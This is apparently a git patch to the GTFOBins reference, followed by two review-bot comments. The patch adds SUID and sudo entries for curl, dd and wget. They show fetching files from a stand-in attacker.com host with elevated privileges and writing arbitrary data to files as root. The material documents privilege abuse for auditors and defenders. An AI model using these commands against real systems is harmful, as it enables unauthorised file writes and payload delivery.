From b016b7b9dd09fd6b8c402c66127bf497aa8b87d4 Mon Sep 17 00:00:00 2001
From: Emilio Pinna
Date: Sun, 22 Jul 2018 14:30:03 +0100
Subject: [PATCH] Add suid-enabled and sudo-enabled to curl, dd, and wget
---
 _gtfobins/curl.md | 12 ++++++++++++
 _gtfobins/dd.md | 8 ++++++++
 _gtfobins/wget.md | 12 ++++++++++++
 3 files changed, 32 insertions(+)
diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md
index c14cc1b..ed228e9 100644
--- a/_gtfobins/curl.md
+++ b/_gtfobins/curl.md
@@ -17,4 +17,16 @@ functions:
 code: |
 LFILE=/tmp/file_to_read
 curl file://$LFILE
+ suid-enabled:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ URL=http://attacker.com/file_to_get
+ LFILE=file_to_save
+ ./curl $URL -o $LFILE
+ sudo-enabled:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ URL=http://attacker.com/file_to_get
+ LFILE=file_to_save
+ sudo -E curl $URL -o $LFILE
 ---
diff --git a/_gtfobins/dd.md b/_gtfobins/dd.md
index 192bfc2..c179268 100644
--- a/_gtfobins/dd.md
+++ b/_gtfobins/dd.md
@@ -8,4 +8,12 @@ functions:
 - code: |
 LFILE=file_to_read
 dd if=LFILE
+ suid-enabled:
+ - code: |
+ LFILE=file_to_write
+ echo "data" | ./dd of=$LFILE
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_write
+ echo "data" | sudo -E dd of=$LFILE
 ---
diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md
index 1c141e6..659f81e 100644
--- a/_gtfobins/wget.md
+++ b/_gtfobins/wget.md
@@ -12,4 +12,16 @@ functions:
 export URL=http://attacker.com/file_to_get
 export LFILE=file_to_save
 wget $URL -O $LFILE
+ suid-enabled:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export URL=http://attacker.com/file_to_get
+ export LFILE=file_to_save
+ ./wget $URL -O $LFILE
+ sudo-enabled:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export URL=http://attacker.com/file_to_get
+ export LFILE=file_to_save
+ sudo -E wget $URL -O $LFILE
 ---
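Review bot: The `suid-enabled` and `sudo-enabled` descriptions added here repeat the unprivileged text, so the entry never states what the elevated context changes: the file named by `-o $LFILE` is created with the SUID owner's or root's privileges, which is what someone auditing SUID bits or sudoers rules on curl needs to see. I would say so in the text, e.g. `description: Fetch a remote file via HTTP GET request. The output file is written with the privileges of the SUID owner.` and the matching wording for sudo; the wget hunk has the same gap. Separately, `$URL` and `$LFILE` are expanded by the calling shell before sudo starts, so `-E` has no effect on them in `sudo -E curl $URL -o $LFILE` (nor in the dd and wget hunks), and quoting them as `"$URL"` and `"$LFILE"` would keep the sample well-formed for values containing spaces.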
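Review bot: The two dd items added here have no `description:` key, unlike the curl and wget items in the same commit, so the page does not say that the sample writes a file or that the write happens with elevated privileges. I would add `description: Write data to a file with the privileges of the SUID owner.` under `suid-enabled` and the sudo equivalent under `sudo-enabled`. The context line `dd if=LFILE` just above also lacks the `$` that the new `of=$LFILE` lines use; it sits outside the added lines but is worth correcting to `dd if=$LFILE` in the same file.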